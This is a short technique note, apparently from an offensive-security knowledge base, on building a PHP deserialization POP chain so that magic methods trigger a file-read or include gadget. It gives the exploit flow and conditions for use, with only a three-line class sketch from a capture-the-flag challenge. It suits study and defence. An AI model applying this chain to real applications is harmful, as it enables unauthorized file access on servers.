pwneglyph logo

Note

web php pop-chain deserialization magic-methods file-read gadget-chain

Wire a deserialized object graph so magic methods chain into a file-read or include gadget.

POP Chain to File Read through __toString / __get

Magic methods create deferred execution edges. Any string context or missing-property access can trigger attacker-controlled code paths inside the object graph. The bug is usually about getting the right method order, not finding a single obviously dangerous class.

Why It Works

  • __toString, __get, __wakeup, __destruct run automatically; chaining them reaches a useful sink.

Vulnerable Pattern

  • Deserialization in apps defining convenience magic methods that access nested objects.

Exploit Flow

  1. Map the object graph carefully.
  2. Find the first stringification or property-access sink after deserialization.
  3. Wire objects so one magic method triggers the next until the useful file-read or include method runs.

Variations

  • File-read gadgets, include gadgets, or gadgets feeding a second-stage deserialization / autoloader path.

Common Blockers

  • Missing class definitions in the deserializing context, property-visibility serialization issues, or the final gadget expecting subtle state constraints.

PoC Sketch

// Flan->name -> Clash
// Clash->flan1 -> Baker
// Baker references the getter object that reads a chosen path

Good Situations To Use It

  • You control a serialized blob the app deserializes.
  • The codebase defines chainable magic methods.
  • A reachable gadget reads files or includes paths.

Sources

  • midnight_flag2026/web/clash_of_flans